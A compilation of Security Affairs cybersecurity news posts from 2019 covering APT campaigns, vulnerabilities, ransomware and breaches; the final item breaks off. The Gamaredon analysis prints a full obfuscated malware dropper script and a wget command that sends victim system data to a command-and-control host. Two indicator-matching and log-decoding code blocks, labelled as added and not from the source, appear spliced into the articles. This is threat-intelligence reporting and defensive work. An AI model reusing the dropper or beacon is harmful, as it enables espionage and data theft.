“Huawei welcomes reports that the UK government is moving towards allowing Huawei to help build the UK’s 5G network,” it said in a brief statement.

“This green light means that UK businesses and consumers will have access to the fastest and most reliable networks thanks to Huawei’s cutting edge technology.”

“While we await a formal government announcement, we are pleased that the UK is continuing to take an evidence-based approach to its work and we will continue to work cooperatively with the government, and the industry,” the Chinese company added.

What will happen after this decision?

The UK is a member of the Five Eyes intelligence alliance (US, UK, Australia, Canada, and New Zealand); agencies from other member countries have already announced bans on Chinese technology, and the decision could spark a heated debate.

Earlier this month Germany also announced that it would not ban Huawei from the auction to build its 5G network.

Pierluigi Paganini

(SecurityAffairs – Huawei, 5G)

The post Britain ‘Approves’ Huawei role in building ‘non-core’ parts for 5G Network appeared first on Security Affairs.

A flaw in Rockwell Controller allows attackers to redirect users to malicious Sites

A serious flaw in some of Rockwell Automation’s MicroLogix and CompactLogix PLCs can be exploited by a remote attacker to redirect users to malicious websites.

Some of Rockwell Automation’s MicroLogix and CompactLogix PLCs are affected by a serious vulnerability that can be exploited by a remote attacker to redirect users to malicious websites.

The vulnerability was tracked as CVE-2019-10955 and received a CVSS score of 7.1 (high severity); it affects MicroLogix 1100 and 1400, and CompactLogix 5370 (L1, L2 and L3) controllers.

Both the ICS-CERT and Rockwell Automation published a security advisory.

The flaw is an open redirect vulnerability that affects the web server running on the vulnerable devices. According to the experts, the web server accepts user input from the PLC’s web interface, and a remote, unauthenticated attacker can inject a malicious link that redirects users from the controller’s web server to a malicious website.

“Successful exploitation of this vulnerability could allow a remote unauthenticated attacker to input a malicious link redirecting users to a malicious website.” reads the advisory published by the US ICS-CERT.

“An open redirect vulnerability could allow a remote unauthenticated attacker to input a malicious link to redirect users to a malicious site that could run or download arbitrary malware on the user’s machine.”

Rockwell Automation’s MicroLogix

According to the attack scenario described in the security advisory published by Rockwell (available to registered users), the malicious website could be used to deliver malware on the user’s machine.

“This malicious website could potentially run or download arbitrary malware on the user’s machine. The target of this type of attack is not the industrial control device and does not disrupt its control functionality,” reads the advisory published by Rockwell.

Rockwell has released firmware updates that address the vulnerability for the affected controllers. To mitigate the issue it is possible to disable the web server.

Below are the recommendations published by Rockwell Automation to minimize the risk of exploitation of this vulnerability:

  • Update to the latest available firmware revision that addresses the associated risk.
  • Use trusted software, software patches, anti-virus/anti-malware programs, and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods such as virtual private networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. VPN is only as secure as the connected devices.
  • Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.

The ICS-CERT credited Josiah Bryan and Giancarlo Palavicini for reporting this vulnerability to NCCIC.

Pierluigi Paganini

(SecurityAffairs – Rockwell, hacking)

The post A flaw in Rockwell Controller allows attackers to redirect users to malicious Sites appeared first on Security Affairs.

Zero-day vulnerability in Oracle WebLogic

Security experts are warning of a dangerous zero-day remote code vulnerability that affects the Oracle WebLogic service platform.


Oracle WebLogic wls9_async and wls-wsat components are affected by a deserialization remote command execution zero-day vulnerability.

This zero-day flaw affects all Weblogic versions, including the latest one, that have the wls9_async_response.war and wls-wsat.war components enabled.

Oracle WebLogic Server is a Java EE application server currently developed by Oracle Corporation, it is used by numerous applications and web enterprise portals based on Java technology. The flaw received the identifier CNVD-C-2019-48814.

An attacker could exploit the vulnerability to remotely execute commands without authorization by sending a specially crafted HTTP request.

Weblogic zeroday

According to the bulletin CNTA-2019-0015 issued by CNCERT/CC, the flaw affects the WebLogic 10.x and WebLogic 12.1.3 versions. The critical flaw has not yet been addressed by Oracle.

Experts recommend disabling the vulnerable modules “wls9_async_response.war” and “wls-wsat.war”, or blocking access to the URLs “/_async/*” and “/wls-wsat/*” within Oracle WebLogic installs.

Experts at KnownSec 404 Team searched for vulnerable instances online by using the ZoomEye search engine, they found 36,173 installs, most of them in the US and China.

Weblogic zeroday 2

Experts at F5 Labs revealed to have already spotted a campaign exploiting the zero-day flaw in Weblogic servers.

Pierluigi Paganini

(SecurityAffairs – Weblogic, zero-day)

The post Zero-day vulnerability in Oracle WebLogic appeared first on Security Affairs.

Stuart City is the new victim of the Ryuk Ransomware

Another city fell victim to a malware attack: systems at the city of Stuart, Fla., were infected by the Ryuk ransomware on April 13, 2018.

Law enforcement is investigating a ransomware attack that hit the City of Stuart on April 13, 2018. The Ryuk malware infected several servers and forced them offline.

“City officials on Wednesday confirmed a computer virus that infected servers over the weekend was the result of a ransomware attack.” reported the website TCPalm.

“The virus detected Saturday froze up the city’s servers and they are still offline, said Stuart City manager David Dyess.”

According to officials, the ransomware attack targeting the city of Stuart started with a phishing email, the infection was discovered by an IT employee who was setting up a new server.

City manager David Dyess confirmed that the city systems were infected with a strain of the Ryuk ransomware, but he did not disclose the Bitcoin ransom demanded by crooks.

“They discovered we had two things going on: We had what’s called a trickbot, which is basically a malware type of regular virus which can lead to other more serious issues,” Dyess said. “We also had the Ryuk virus that is an encryptor virus, where it encrypts your files and specifically likes to target your servers.”

Stuart city

At the time of writing, Dyess confirmed that experts are investigating to determine how the attackers infected the systems.

IT staff at Stuart city have restored servers, payroll, utilities, and budgeting; city employees, however, still do not have access to their email accounts.

Stuart’s police and fire departments are still offline; Dyess believes that overall services should be fully restored within the next week.

In early March, another city was hit by the same ransomware: computers of Jackson County, Georgia, were infected with Ryuk, which paralyzed government activity until officials decided to pay a $400,000 ransom to decrypt the files.

Unlike Jackson County, Stuart City refused to pay the ransom.

“We are not negotiating with them. We are in the process of trying to rebuild our systems,” Dyess said. “We also began scanning every server in the city and every (personal computer) and every laptop in every department to eliminate any viruses on those outer machines.”

Dyess confirmed that the impact was limited thanks to the availability of the city’s computer backup system.

“If we wouldn’t have had these viable backups, we would probably be in a situation where we had to move into negotiations,” he said. “But with those backups in place, why would we negotiate?”

The Ryuk ransomware appears connected to Hermes malware that was associated with the notorious Lazarus APT group.

The same ransomware was recently used in an attack that affected the newspaper distribution for large major newspapers, including the Wall Street Journal, the New York Times, and the Los Angeles Times.

Further investigation of the malware allowed the experts from security firms FireEye and CrowdStrike to discover that the threat actors behind the Ryuk ransomware are working with another cybercrime gang to gain access to target networks. They are collaborating with the threat actors behind TrickBot, a malware that, once it has infected a system, creates a reverse shell back to the attackers, allowing them to break into the network.

Experts at CrowdStrike believe the Ryuk ransomware is operated by a crime gang they track as GRIM SPIDER, in particular by its Russia-based cell dubbed WIZARD SPIDER that is behind TrickBot.

Experts pointed out that Hermes was available for sale in the online underground community; attackers could have purchased it to create their own version of Ryuk.

Pierluigi Paganini

(SecurityAffairs – Ryuk ransomware, Stuart city)

The post Stuart City is the new victim of the Ryuk Ransomware appeared first on Security Affairs.

The Russian Shadow in Eastern Europe: Gamaredon ‘s Ukrainian MOD Campaign

Security researchers at Yoroi-Cybaze ZLab uncovered a new campaign carried out by the Russian state-actor dubbed Gamaredon.

Introduction

A few days after the publication of our technical article related to the evidence of possible APT28 interference in the Ukrainian elections, we spotted another signal of a sneakier on-going operation.

This campaign, instead, seems to be linked to another Russian hacking group: Gamaredon. The Gamaredon APT was first spotted in 2013 and in 2015, when researchers at LookingGlass shared the details of a cyber espionage operation tracked as Operation Armageddon, targeting other Ukrainian entities. Their “special attention” on Eastern European countries was also confirmed by CERT-UA, the Ukrainian Computer Emergency Response Team.

The discovered attack appears to be designed to lure military personnel: it leverages a legitimate document of the “State of the Armed Forces of Ukraine” dated 2 April 2019.

Figure 1: Fake document shown after infection

For this reason, Cybaze-Yoroi ZLAB team dissected this suspicious sample to confirm the possible link with Russian threat actors.

Technical Analysis

The origin of the infection is an executable file pretending to be an RTF document.

Sha256: 41a6e54e7ac2d488151d2b40055f3d7cacce7fb53e9d33c1e3effd4fce801410
Threat: Gamaredon Pteranodon stager (SFX file)
Ssdeep: 12288:VpRN/nV+Nn3I4Wyawz2O7TE+sNEAMqdJnGB6q5c7pQbaOwWsAsK0iR7bkfeanZ8O:VpT/nV+N3I

Table 1: Information about analyzed sample

Actually, the file is a Self Extracting Archive (SFX) claiming to be part of some Oracle software, with an invalid signature. Its expiration date was set to 16 March 2019.

Figure 2: Fake Oracle certificate with an expiration date set on 16th of March 2019

A first glance inside the SFX archive reveals four different files. One of them is a batch file containing the actual infection routine.

Figure 3: Files contained in SFX archive
@echo offset xNBsBXS=%random%*JjuCBOSFor %%q In (wireshark procexp) do (TaskList /FI “ImageName EQ %%q.exe” | Find /I “%%q.exe”)If %ErrorLevel% NEQ 1 goto exitIf SddlzCf==x86 Set WqeZfrx=x64if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOSset “ldoGIUv=%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\”CEFNPKLIf SddlzCf==x86 Set WqeZfrx=x64set “UlHjSKD=%USERPROFILE%”set qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXSset fnQWAZC=winsetupset xNBsBXS=%random%*JjuCBOSset qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXSset “paJvVjr=Document”if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOSset eBqwVLK=%fnQWAZC%.lnkCEFNPKLif SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOSset YFCaOEf=28262set qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXSset vvozoFB=11326set lDwWuLo=26710If SddlzCf==x86 Set WqeZfrx=x64set prJqIBB=dcthfdyjdfcdst,tvset qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXSif SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOStaskkill /f /im %fnQWAZC%.exeCEFNPKLRENAME “%lDwWuLo%” %lDwWuLo%.exeset xNBsBXS=%random%*JjuCBOS%lDwWuLo%.exe “-p%prJqIBB%set qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXScopy /y “%fnQWAZC%” “%UlHjSKD%\%fnQWAZC%.exe”if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOSif exist “%UlHjSKD%\%fnQWAZC%.exe” call :GhlJKaGIf SddlzCf==x86 Set WqeZfrx=x64if not exist “%UlHjSKD%\%fnQWAZC%.exe” call :PEEnqrLset xNBsBXS=%random%*JjuCBOSRENAME “%YFCaOEf%” %eBqwVLK%if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOScopy “%eBqwVLK%” “%ldoGIUv%” /yset qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXSRENAME “%vvozoFB%” “%paJvVjr%.docx”if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOS”%CD%\%paJvVjr%.docx”set xNBsBXS=%random%*JjuCBOSexit /b
:GhlJKaGif SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOSstart “” “%UlHjSKD%\%fnQWAZC%.exe”CEFNPKLexit /b
:PEEnqrLset xNBsBXS=%random%*JjuCBOSRENAME “%fnQWAZC%” %fnQWAZC%.exe::6start “” “%fnQWAZC%.exe”If SddlzCf==x86 Set WqeZfrx=x64exit /b

Firstly, this batch script looks for the presence of running Wireshark and Process Explorer programs through the tasklist.exe utility. Then it renames the “11326” file to “Document.docx” and opens it. This is the decoy document seen in Figure 1.

The third step is to extract the contents of the password-protected archive named “26710”. The script uses the hard-coded password “dcthfdyjdfcdst,tv” to extract its content, placing it at “%USERPROFILE%\winsetup.exe” and creating a LNK shortcut in the “%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\” directory to ensure its persistence.

Sha256: 653a4205fa4bb7c58ef1513cac4172398fd5d65cab78bef7ced2d2e828a1e4b5
Threat: Gamaredon Pteranodon stager (SFX)
Ssdeep: 12288:9pRN/nV+Nn4mNoks/EysKvqjigldJuFjBqg9DmTBs34I8:9pT/nV+N4QokKK7zg9qgQI8

Table 2: Information about SFX stager

This additional file is an SFX file containing another script and a PE32 binary.

Figure 4: Files contained in SFX archive

The “MicrosoftCreate.exe” file is the UPX-packed version of the “wget” tool compiled for Windows, a free utility for non-interactive HTTP downloads and uploads, a flexible tool commonly used by sys-admins and sometimes abused by threat actors.

The actual malicious logic of the Pteranodon implant is contained within the “30347.cmd” script. Besides junk instructions and obfuscation, the malware gathers information about the compromised machine through the command “systeminfo.exe”. The results are stored in the file “fnQWAZC” and then sent to the command and control server “librework[.ddns[.net”, leveraging the wget utility previously found.

Figure 5: The C2 and obfuscations technique
MicrosoftCreate.exe --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0" --post-data="versiya=arm_02.04&comp=ADMIN-PC&id=ADMIN-PC_del&sysinfo=Nome host:                            ADMIN-PC+###……."
Figure 6: Information about victim machine sent to C2

The malware also schedules the execution of two other actions.

Figure 7: Persistence through task schedule

The first one tries to contact “bitwork[.ddns[.net” to download a “setup.exe” file and store it in the same folder. The other file, “ie_cash.exe”, is stored in the “%APPDATA%\Roaming\Microsoft\IE\” folder. Despite the different name, it actually is another copy of the wget tool.

Figure 8: Persistence through task schedule (II)

The second scheduled activity runs every 32 minutes and is designed to execute the files downloaded by the previous task. This is a trick that has long been part of the Gamaredon arsenal: in fact, the recovered sample is part of the Pteranodon implant and matches its typical code patterns, showing no relevant edits with respect to previous variants.

In the end, investigating the “librework[.ddns[.net” domain we discovered several other samples connecting to the same C2. All of them appeared in the wild during the first days of April, suggesting the command infrastructure might still be fully functional.

Figure 9: other samples linked to “librework[.ddns[.net” C2 (Source:VT)
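The network behaviour described above (the beacon POSTed through the renamed wget copy, and the follow-up download from the second DDNS host) can be turned into a small triage check. The following is an added example, not code from the Yoroi analysis: it matches the indicators named in the text against proxy log lines. The log layout, the request paths, the client address and the wget version string in the sample are constructed for this example.

```javascript
// Added example (not from the Yoroi analysis): matching the Pteranodon
// network indicators described in the text against constructed proxy log lines.

// C2 hosts named in the analysis (written defanged there).
const C2_DOMAINS = new Set(["librework.ddns.net", "bitwork.ddns.net"]);

// Beacon body layout shown in Figure 6:
//   versiya=<ver>&comp=<host>&id=<id>&sysinfo=<systeminfo output>
const BEACON_BODY = /(?:^|&)versiya=([^&]*)&comp=([^&]*)&id=([^&]*)&sysinfo=/;

// User agent hard-coded in the sample's wget command line (Figure 6).
const SPOOFED_UA = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0";

// Assumed proxy log layout (one request per line), constructed for this example:
//   <iso-time> <client-ip> <method> <url> <bytes> "<user-agent>" [body="<post body>"]
const LINE_RE = /^(\S+) (\S+) (GET|POST) (\S+) (\d+) "([^"]*)"(?: body="([^"]*)")?$/;

function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  const [, ts, client, method, url, bytes, ua, body] = m;
  let host;
  try {
    host = new URL(url).hostname.toLowerCase();
  } catch {
    return null; // malformed URL: not a request we can assess
  }
  return { ts, client, method, url, host, bytes: Number(bytes), ua, body: body || "" };
}

// Returns the list of indicator names that fire for one parsed request.
function classify(req) {
  const hits = [];
  if (C2_DOMAINS.has(req.host)) hits.push("known-c2-domain");
  const f = BEACON_BODY.exec(req.body);
  if (f) hits.push(`beacon-body(version=${f[1]},comp=${f[2]},id=${f[3]})`);
  // A POST carrying the beacon body under the spoofed Firefox 51 UA is the
  // combination the sample produces; either half alone is weak evidence.
  if (req.method === "POST" && req.ua === SPOOFED_UA && f) hits.push("spoofed-ua-beacon");
  return hits;
}

function scan(logText) {
  return logText
    .split("\n")
    .map((l) => l.trim())
    .filter(Boolean)
    .map(parseLine)
    .filter(Boolean)
    .map((req) => ({ ...req, hits: classify(req) }))
    .filter((req) => req.hits.length > 0);
}

// Constructed sample: one beacon, one benign request, one follow-up download
// fetched by the second wget copy without a spoofed user agent.
const SAMPLE_LOG = `
2019-04-02T10:15:01Z 10.0.0.12 POST http://librework.ddns.net/ 812 "${SPOOFED_UA}" body="versiya=arm_02.04&comp=ADMIN-PC&id=ADMIN-PC_del&sysinfo=Nome host: ADMIN-PC"
2019-04-02T10:15:07Z 10.0.0.12 GET https://www.example.com/index.html 5120 "${SPOOFED_UA}"
2019-04-02T10:47:10Z 10.0.0.12 GET http://bitwork.ddns.net/setup.exe 0 "Wget/1.11.4"
`;

function scanSample() {
  return scan(SAMPLE_LOG);
}

if (typeof require !== "undefined" && require.main === module) {
  for (const r of scanSample()) console.log(r.ts, r.client, r.host, r.hits.join(" "));
}
```

The body match is the useful part: the domains will rotate, but the `versiya=…&comp=…&id=…&sysinfo=` field layout is what the stager emits and survives a change of C2 host.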

Conclusion

The Pteranodon implant seems to have been constantly maintained by the Gamaredon APT group since 2013, a tool the attackers evidently found very effective since they are still using it after such a long time. Apart from this technical consideration, it is quite interesting to notice how strong the Russian interest in Eastern Europe appears to be, alongside the other recent state-sponsored activities possibly aimed at interfering with Ukrainian politics (see “APT28 and Upcoming Elections: evidence of possible interference” and Part II), confirming this cyber-threat is operating on several fronts.

Further details, including Indicators of Compromise and Yara rules, are reported in the analysis published on the Yoroi Blog.

Pierluigi Paganini

(SecurityAffairs – Ukraine, Gamaredon)

The post The Russian Shadow in Eastern Europe: Gamaredon ‘s Ukrainian MOD Campaign appeared first on Security Affairs.

OilRig APT uses Karkoff malware along with DNSpionage in recent attacks

Iran-linked OilRig cyberespionage group is using the reconnaissance malware Karkoff along with DNSpionage in recent campaigns.

The OilRig APT group, the threat actor behind the DNSpionage malware campaign, is carrying out a new sophisticated and targeted operation that infects victims with a new variant of the dreaded malware.

DNSpionage is a custom RAT that uses HTTP and DNS communication to connect with the C&C server.

Threat actors distributed the malware through compromised websites and weaponized documents.

“In February, we discovered some changes to the actors’ tactics, techniques and procedures (TTPs), including the use of a new reconnaissance phase that selectively chooses which targets to infect with malware.” reads the analysis published by Talos. “In April 2019, we also discovered the actors using a new malware, which we are calling “Karkoff.”

DNSpionage decoy doc

According to Cisco Talos threat research team, the attackers are leveraging on new tactics, techniques, and procedures to improve the efficacy of their operations.

Unlike previous attacks, the group is now using a new malware, tracked as Karkoff, for reconnaissance purposes. Karkoff is used by the attackers to surgically select a target and remain under the radar: it gathers system information related to the workstation environment, operating system, domain, and the list of running processes on the victim’s machine.

Karkoff is developed in .NET; it also allows attackers to remotely execute arbitrary code on compromised hosts.

The experts link the DNSpionage and Karkoff malware after observing overlaps between their C2 infrastructure.

Experts noticed that the malware searches for two specific anti-virus solutions, Avira and Avast. If one of them is installed on the target system, a specific flag will be set, and some options from the configuration file will be ignored.

Researchers at Talos noticed that the Karkoff malware generates a log file on the compromised machine which tracks all commands it has executed and related timeline.

“From an incident response point of view, it’s interesting to note that the malware generates a log file: C:\\Windows\\Temp\\MSEx_log.txt. The executed commands are stored in this file (xored with ‘M’) with a timestamp.” continues the experts. “This log file can be easily used to create a timeline of the command execution which can be extremely useful when responding to this type of threat. With this in mind, an organisation compromised with this malware would have the opportunity to review the log file and identify the commands carried out against them.”
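Because a single-byte XOR is its own inverse, the log described above can be read back with the same operation the malware applied. The following is an added example, not Talos’s or the malware’s code: it strips the ‘M’ XOR layer and rebuilds a command timeline. The report only states that each command is stored XORed with ‘M’ together with a timestamp, so the line layout `<YYYY-MM-DD HH:MM:SS><tab><command>` and the sample commands are assumptions constructed for the example.

```javascript
// Added example (not Talos's or the malware's code): reading a Karkoff-style
// log whose bytes are XORed with 'M' and turning it into a command timeline.
// Line layout "<YYYY-MM-DD HH:MM:SS>\t<command>" is an assumption.

const XOR_KEY = "M".charCodeAt(0); // 0x4d

// XOR with one byte is an involution: the same call encodes and decodes.
function xorM(buf) {
  const out = Buffer.alloc(buf.length);
  for (let i = 0; i < buf.length; i++) out[i] = buf[i] ^ XOR_KEY;
  return out;
}

// Fraction of bytes that are printable ASCII or line/tab whitespace.
function printableRatio(buf) {
  if (buf.length === 0) return 0;
  let n = 0;
  for (const b of buf) if ((b >= 0x20 && b < 0x7f) || b === 0x0a || b === 0x0d || b === 0x09) n++;
  return n / buf.length;
}

// Heuristic: apply the XOR and keep whichever version reads as text, so a
// file already decoded by an earlier triage step is not re-scrambled.
function decodeLog(buf) {
  const candidate = xorM(buf);
  return printableRatio(candidate) > printableRatio(buf) ? candidate : buf;
}

const LINE_RE = /^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\t(.+)$/;

// Returns {entries: [{time, command}] sorted by time, unparsed: [lines]}.
function buildTimeline(buf) {
  const text = decodeLog(buf).toString("latin1");
  const entries = [];
  const unparsed = [];
  for (const line of text.split(/\r?\n/)) {
    if (!line) continue;
    const m = LINE_RE.exec(line);
    if (m) entries.push({ time: m[1], command: m[2] });
    else unparsed.push(line); // keep anything odd for a human to look at
  }
  entries.sort((a, b) => a.time.localeCompare(b.time));
  return { entries, unparsed };
}

// Constructed sample: three commands written out of order, then encoded with
// the same XOR the malware uses.
const SAMPLE_PLAINTEXT =
  ["2019-04-20 09:13:05\tipconfig /all", "2019-04-20 09:12:33\twhoami", "2019-04-20 09:12:40\ttasklist"].join("\r\n") +
  "\r\n";
const SAMPLE_LOG = xorM(Buffer.from(SAMPLE_PLAINTEXT, "latin1"));

function sampleTimeline() {
  return buildTimeline(SAMPLE_LOG);
}

if (typeof require !== "undefined" && require.main === module) {
  for (const e of sampleTimeline().entries) console.log(e.time, e.command);
}
```

The printable-ratio check is deliberately simple; on a real file the safer confirmation is that timestamps appear at the start of lines only after the XOR is applied.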

Attackers behind the DNSpionage campaigns continue to be focused on entities in the Middle Eastern region, including Lebanon and the United Arab Emirates (UAE).

“The threat actor’s ongoing development of DNSpionage malware shows that the attacker continues to find new ways to avoid detection.” “DNS tunneling is a popular method of exfiltration for some actors and recent examples of DNSpionage show that we must ensure DNS is monitored as closely as an organization’s normal proxy or weblogs.” concludes Talos. “The discovery of Karkoff also shows the actor is pivoting and is increasingly attempting to avoid detection while remaining very focused on the Middle Eastern region.”

Pierluigi Paganini

(SecurityAffairs – hacking, DNSpionage)


Kaspersky speculates the involvement of ShadowPad attackers in Operation ShadowHammer

Experts at Kaspersky Lab linked the recent supply-chain attack targeted ASUS users to the “ShadowPad” threat actor and the CCleaner incident.

Security researchers at Kaspersky Lab linked the recent supply-chain attack that hit ASUS users (tracked as Operation ShadowHammer) to the “ShadowPad” threat actor. Experts also linked the incident to the supply chain attack that targeted CCleaner in September 2018. The Operation ShadowHammer campaign was uncovered by experts from Kaspersky Lab; it took place between June and November 2018, but experts only discovered it in January 2019. The attackers used a Trojanized version of the ASUS Live Update utility to install a backdoor on specific devices, selected based on their MAC addresses. ASUS has since released software updates to address the issue.

According to Kaspersky, threat actors tampered with a legitimate binary that was initially compiled in 2015 and that was digitally signed to avoid detection.

The malicious code injected in the binaries allows the attackers to fetch and install a backdoor used to control the compromised systems.

“It is important to note that any, even tiny, tampering with executables in such a case normally breaks the digital signature. However, in this case, the digital signature was intact: valid and verifiable. We quickly realized that we were dealing with a case of a compromised digital signature.” reads the analysis published by Kaspersky.

“We believe this to be the result of a sophisticated supply chain attack, which matches or even surpasses the ShadowPad and the CCleaner incidents in complexity and techniques. The reason that it stayed undetected for so long is partly the fact that the trojanized software was signed with legitimate certificates (e.g. “ASUSTeK Computer Inc.”).”

The supply chain attack was very sophisticated and very targeted, the backdoor was designed to be installed on only 600 select devices, identified through their MAC address.

Some of the MAC addresses targeted by the hackers were rather popular, such as 00-50-56-C0-00-08, which belongs to the VMware virtual adapter VMNet8 and is shared by all users of a certain version of the VMware software for Windows.

Another MAC address used in the attack was 0C-5B-8F-27-9A-64, which belongs to a virtual Ethernet adapter designed by Huawei for the USB 3G modem, model E3372h.

During their investigation, experts found other digitally signed binaries from three other vendors in Asia. The binaries are signed with different certificates and a unique chain of trust, but experts pointed out that the way the binaries were trojanized was the same in the three cases.

“The malicious code was not inserted as a resource, neither did it overwrite the unused zero-filled space inside the programs. Instead, it seems to have been neatly compiled into the program, and in most cases, it starts at the beginning of the code section as if it had been added even before the legitimate code.” continues the analysis. “Even the data with the encrypted payload is stored inside this code section. This indicates that the attackers either had access to the source code of the victim’s projects or injected malware on the premises of the breached companies at the time of project compilation.”


Experts found many similarities between non-ASUS-related cases and the ASUS supply chain attack, such as the algorithm used to calculate API function hashes, and the use of IPHLPAPI.dll from within a shellcode embedded into a PE file.

The investigators also found a connection between the ASUS attack to the ShadowPad backdoor that was first detected in 2017 and that was attributed to the Axiom group (also known as APT17 or DeputyDog).

The most popular campaign attributed to the APT17 group is the attack on Google’s infrastructure, also known as Operation Aurora. For almost a decade APT17 targeted government organizations in several Southeast Asian countries and the US, NGOs, defense contractors, law firms, IT firms, and mining companies.

According to malware experts at Intezer the code used in the CCleaner attack has many similarities with the code used by the Axiom group.

Experts at Kaspersky noticed that the malicious code used in Operation ShadowHammer reused algorithms from multiple malware samples, including many from the PlugX RAT, a backdoor used by many Chinese-speaking hacker groups.

“ShadowPad, a powerful threat actor, previously concentrated on hitting one company at a time. Current research revealed at least four companies compromised in a similar manner, with three more suspected to have been breached by the same attacker.” Kaspersky concludes. 

“How many more companies are compromised out there is not known. What is known is that ShadowPad succeeded in backdooring developer tools and, one way or another, injected malicious code into digitally signed binaries, subverting trust in this powerful defense mechanism,”

Pierluigi Paganini

(SecurityAffairs – Asus Supply Chain attack, ShadowPad )


Bodybuilding.com forces password reset after a security breach

Bad news for fitness and bodybuilding enthusiasts: the popular online retailer Bodybuilding.com announced that hackers have broken into its systems.

The popular online retailer website Bodybuilding.com announced last week that hackers have broken into its systems. The website offers any kind of fitness articles, exercises, workouts, and supplements.

The company confirmed it has no evidence that personal customer information was accessed or misused; as a precautionary measure, it is notifying all current and former users and customers.

“Bodybuilding.com recently became aware of a data security incident that may have affected certain customer information in our possession. We have no evidence that personal information was accessed or misused, but we are directly notifying all current and former users and customers out of an abundance of caution.” reads the announcement published on the website.

“We became aware of a data security incident involving unauthorized access to our systems in February 2019. We engaged one of the leading data security firms to conduct a thorough investigation, which traced the unauthorized activity to a phishing email received in July 2018. On April 12, 2019, we concluded our investigation and could not rule out that personal information may have been accessed.”

The company hired a security firm to investigate the incident, which discovered that the attack began with a phishing email received in July 2018.

The company reported the incident to law enforcement and, with the help of the security firm, is addressing the flaws exploited by the attackers and remediating the incident. The IT staff behind Bodybuilding.com also introduced additional security measures and forced a password reset for its customers.

Data potentially exposed in the incident includes name, Bodybuilding.com username and password, email address, billing/shipping addresses, phone number, order history, any communications with Bodybuilding.com, birthdate, and any information included in the BodySpace profile.

According to the firm, the potentially accessed data does not include full payment card numbers because the firm does not store them.

“The information potentially accessed in this incident does NOT include full credit or debit card numbers, as we do not store those numbers when customers make purchases in our store.” continues the data breach notification note. “If you’ve opted to store your card in your account, we store only the last four digits of your payment card number for reference and use by you for subsequent purchases, but never the entire card number.”

Bodybuilding.com Discloses Data Breach

As usual, Bodybuilding.com users have to change their password on any other account where they used the same credentials as for their Bodybuilding.com account.

Below are the recommendations provided by the company:

  • Change your password for any other account on which you used the same or similar information used for your Bodybuilding.com account.
  • Review your accounts for suspicious activity.
  • Be cautious of any unsolicited communications that ask for your personal data or refer you to a web page asking for personal data.
  • Avoid clicking on links or downloading attachments from suspicious emails.

Pierluigi Paganini

(SecurityAffairs – fingerprints, Genesis Store)


FireEye experts found source code for CARBANAK malware on VirusTotal

Cybersecurity researchers from FireEye revealed that the Carbanak source code has been available on VirusTotal for two years, and no one noticed it before.

Researchers at FireEye discovered that the Carbanak source code has been available on VirusTotal for two years, but it was not noticed before.

The Carbanak gang (aka FIN7, Anunak or Cobalt) stole over a billion euros from banks across the world; the name “Carbanak” comes from the name of the malware they used to compromise computers at banks, other financial institutions, restaurants, and other industries.

CARBANAK cybercrime gang was first uncovered in 2014 by Kaspersky Lab that dated its activity back to 2013 when the group leveraged the Anunak malware in targeted attacks on financial institutions and ATM networks. Between 2014 and 2016 the group used a new custom malware dubbed Carbanak that is considered a newer version of Anunak.

Starting from 2016 the group developed a new custom malware using Cobalt Strike, a legitimate penetration testing framework.


The experts discovered the source code, builders, and some previously unknown plugins in two different RAR archives.

The two archives were both uploaded two years ago from the same Russian IP address.

“On the heels of that publication, our colleague Nick Carr uncovered a pair of RAR archives containing CARBANAK source code, builders, and other tools (both available in VirusTotal: kb3r1p and apwmie).” reads a blog post published by FireEye.

“CARBANAK source code was 20MB comprising 755 files, with 39 binaries and 100,000 lines of code. Our goal was to find threat intelligence we missed in our previous analyses.”

Last year, between January and June, law enforcement arrested three Ukrainian suspects: Dmytro Fedorov, Fedir Hladyr, and Andrii Kolpakov.

Fedorov, a skilled hacker who is suspected to be a manager of the group, was arrested at the request of U.S. officials in Bielsko-Biala, Poland, in January and is currently awaiting extradition to the United States.

In January 2018 foreign authorities also arrested Fedir Hladyr in Dresden, Germany; he is currently detained in Seattle pending trial. Hladyr is suspected to be a system administrator for the group.

In late June 2018, foreign authorities arrested Andrii Kolpakov in Lepe, Spain.  The man is suspected to be a supervisor of the group. He is currently detained in Spain pending the United States’ request for extradition.

Pierluigi Paganini

(SecurityAffairs – Carbanak, Russia)


Iran-linked APT34: Analyzing the webmask project

Security expert Marco Ramilli published the findings of a quick analysis of the webmask project standing behind the DNS attacks implemented by APT34 (aka OilRig and HelixKitten).

Thanks to the leaked source code it is now possible to check APT34 implementations and techniques.

Context:

Since at least 2014, an Iranian threat group tracked by FireEye as APT34 has conducted reconnaissance aligned with the strategic interests of Iran. The group conducts operations primarily in the Middle East, targeting financial, government, energy, chemical, telecommunications and other industries. Repeated targeting of Middle Eastern financial, energy and government organisations leads FireEye to assess that those sectors are a primary concern of APT34. The use of infrastructure tied to Iranian operations, timing and alignment with the national interests of Iran also lead FireEye to assess that APT34 acts on behalf of the Iranian government. (Source: MISP Project).

